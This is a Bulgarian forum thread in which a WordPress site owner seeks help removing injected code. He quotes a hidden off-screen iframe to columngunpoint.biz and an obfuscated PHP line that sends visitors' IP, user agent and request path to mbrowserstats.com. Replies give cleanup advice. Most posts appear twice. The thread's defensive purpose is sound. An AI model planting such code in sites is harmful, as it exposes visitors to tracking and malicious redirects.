[WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
- Автор bollard
- Начална дата
bollard
Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
<iframe src="http://columngunpoint.biz:7761/ur-admin/wmr/itu
nes.php?desktop=1" width="100" height="100" style="width:100
px;height:100px;position:absolute;left:-10000px;top:0;">
Мисля, че слага адс и го искарва на twitter бутона, от време на време, защото съм го засичал там. Тези дни, ще кача всичко нанова и ще го изчистя, но ми трябва някакво временно решение. От хостинг компанията ми казаха, че не могат да намерят източника.
<iframe src="http://columngunpoint.biz:7761/ur-admin/wmr/itu
nes.php?desktop=1" width="100" height="100" style="width:100
px;height:100px;position:absolute;left:-10000px;top:0;">
Мисля, че слага адс и го искарва на twitter бутона, от време на време, защото съм го засичал там. Тези дни, ще кача всичко нанова и ще го изчистя, но ми трябва някакво временно решение. От хостинг компанията ми казаха, че не могат да намерят източника.
Sky
Well-Known Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Брей за 5 минути и вече ти е индексиран поста :shock:
По-добре намери откъде идва проблема,че сайта към който води е докладван като атакуващ,аз преди време така изгорях 2 месеца се показваше съобщението и за моя сайт.
Пробвай да изключиш плъгините един по един и виж дали няма да изчезне
Брей за 5 минути и вече ти е индексиран поста :shock:
По-добре намери откъде идва проблема,че сайта към който води е докладван като атакуващ,аз преди време така изгорях 2 месеца се показваше съобщението и за моя сайт.
Пробвай да изключиш плъгините един по един и виж дали няма да изчезне
Synthetic
Active Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Не знам дали ще ти е от полза, но пробвай да сканираш блога си от тук http://sitecheck.sucuri.net/scanner/
Виж дали ще ти покаже въпросния шит и цъкни на него. Така може да видиш от какъв вид е, съответно и как други като теб са се справили с този проблем. Интересно през къде са го прикачили този код (ако не е от пиратски плъгин или тема)... Сложи си в папката wp-admin един .htaccess (ако нямаш) и там може да си алоунеш достъп единствено от твоето IP...
Пиши как се развиват нещата
Не знам дали ще ти е от полза, но пробвай да сканираш блога си от тук http://sitecheck.sucuri.net/scanner/
Виж дали ще ти покаже въпросния шит и цъкни на него. Така може да видиш от какъв вид е, съответно и как други като теб са се справили с този проблем. Интересно през къде са го прикачили този код (ако не е от пиратски плъгин или тема)... Сложи си в папката wp-admin един .htaccess (ако нямаш) и там може да си алоунеш достъп единствено от твоето IP...
Пиши как се развиват нещата
Последно редактирано:
mobilio
Well-Known Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Понеже няколко мои познати имат подобен проблем...
НАВЯРНО си използвал хакнат плъгин или тема и тя ти прави мизерии. Трябва да започнеш да спираш един по един плъгините и темите за да видиш откъде излиза това нещо. Ако момчетата са малко по-лоши няма да видиш точно това, ами ще видиш една curl заявка някъде.
Уви докато нямам файловете ти повече не мога да помогна.
Понеже няколко мои познати имат подобен проблем...
НАВЯРНО си използвал хакнат плъгин или тема и тя ти прави мизерии. Трябва да започнеш да спираш един по един плъгините и темите за да видиш откъде излиза това нещо. Ако момчетата са малко по-лоши няма да видиш точно това, ами ще видиш една curl заявка някъде.
Уви докато нямам файловете ти повече не мога да помогна.
bollard
Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Това намерих във файловете с curl
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
като го има и в индекса, така и във футрера.
Това намерих във файловете с curl
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
като го има и в индекса, така и във футрера.
mobilio
Well-Known Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
и това е заявка към http://mbrowserstats.com/statH/stat.php най-вероятно това пръска линка...
и това е заявка към http://mbrowserstats.com/statH/stat.php най-вероятно това пръска линка...
TheCrazyBastard
Well-Known Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Провери всички папки с плъгините ти дали някой от тях няма timthumb.php.
Темите, които се обновяват вече са фикснали проблема, но някои плъгини, използващи съответно това нещо и рядко се обновяват, тази пролука не са я запушили, деактивирай съответно плъгина, който съдържа подобно php в папката си.
Обнови си отделно WP-то, ако не си го направил вече.
Провери всички папки с плъгините ти дали някой от тях няма timthumb.php.
Темите, които се обновяват вече са фикснали проблема, но някои плъгини, използващи съответно това нещо и рядко се обновяват, тази пролука не са я запушили, деактивирай съответно плъгина, който съдържа подобно php в папката си.
Обнови си отделно WP-то, ако не си го направил вече.
Neo2SHYAlien
New Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Сканираш всички файлове в съдържанието си кой има base64_decode обикновено това ползват хахорите за да се крият. За сигурност може да си го си го боърнеш в четим стринг с някой online tool въпреки че като гледам не са били чак толкова умни
Torbalan Trolski
Well-Known Member
От: [WORDPRESS] Как мога да забраня заявки от моя сайт към друг?
Провери си темите с Theme Authenticity Checker (TAC). ИМХО зсе ползва задължително преди да се хвърлиш на нова тема.
Ако не изплува от темата си пусни един мирър на локалхост и вклювай плъгините един по един докато не намериш мизерника.
Провери си темите с Theme Authenticity Checker (TAC). ИМХО зсе ползва задължително преди да се хвърлиш на нова тема.
Ако не изплува от темата си пусни един мирър на локалхост и вклювай плъгините един по един докато не намериш мизерника.